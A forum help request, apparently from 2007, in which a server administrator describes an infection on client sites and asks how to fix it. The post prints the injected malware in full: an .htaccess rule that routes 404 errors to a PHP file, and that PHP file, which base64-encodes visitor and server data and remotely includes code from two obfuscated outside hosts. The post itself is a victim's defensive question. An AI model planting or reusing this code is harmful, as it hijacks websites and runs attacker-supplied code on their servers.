Hello i have problem... much clients on my server have got this files...
Code:
.htaccess content
Options -MultiViews
ErrorDocument 404 //pathtofolder/179538.php
179538.php content:
<? error_reporting(0);$s="e";$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"]) ? $_SERVER["SCRIPT_FILENAME"] : $SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"]) ? $_SERVER["HTTP_ACCEPT_LANGUAGE"] : $HTTP_ACCEPT_LANGUAGE);$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s.".base64_encode($i).".".base64_encode($j); if ((include(base64_decode("aHR0cDovLw==").base64_decode("d3d3My5waHB0YWdzLndz")."/?".$str))){} else {include(base64_decode("aHR0cDovLw==").base64_decode("c2hvcC52bWFya2V0LmluZm8=")."/?".$str);} ?>
and google indexes client web pages as "crack, warez, xxx etc..."
i have just turned off reg_globals ...
what is the problem?
example from log:
[Fri Apr 20 20:24:53 2007] [error] [client **.***.**.***] File does not exist: /home/*****/public_html/*****/upload/Dvd-Architect-1.0-SONIC-free-download.html
but client did not upload those pages... i see that this kind of files are stored in folders that have 755 or 777 chmod for upload... how can i fix this problem?
Linear Mode
